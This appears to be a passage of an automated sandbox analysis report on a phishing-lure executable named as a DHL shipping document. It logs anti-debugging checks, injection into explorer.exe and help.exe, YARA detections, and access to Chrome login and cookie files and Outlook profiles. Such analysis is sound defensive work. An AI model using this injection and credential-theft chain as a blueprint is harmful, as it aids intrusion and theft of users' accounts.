Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AF8D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h] 3_2_00AAA537
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h] 3_2_00A63D43
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h] 3_2_00AA3540
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h] 3_2_00A47D50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h] 3_2_00AA46A7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h] 3_2_00ABFE87
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h] 3_2_00A376E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A516E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A68EC7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h] 3_2_00A536CC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00ADFEC0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8ED6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h] 3_2_00A2E620
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h] 3_2_00ADFE3F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h] 3_2_00A58E00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h] 3_2_00AE1608
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h] 3_2_00A5A61C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h] 3_2_00A3766D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h] 3_2_00AEAE44
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h] 3_2_00A38794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h] 3_2_00A637F5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h] 3_2_00A24F2E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h] 3_2_00A5E730
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h] 3_2_00AF070D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h] 3_2_00A5A70E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h] 3_2_00A4F716
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h] 3_2_00ABFF10
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF60
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AF8F6A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A3EF40
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040CEC3 LdrLoadDll, 3_2_0040CEC3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004018F8 SetUnhandledExceptionFilter, 1_2_004018F8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BF3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401796

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 3B0000
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Thread register set: target process: 3528
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3528
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.333026756.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.580769030.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.324681730.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00401A05 cpuid 1_2_00401A05
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040167D
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY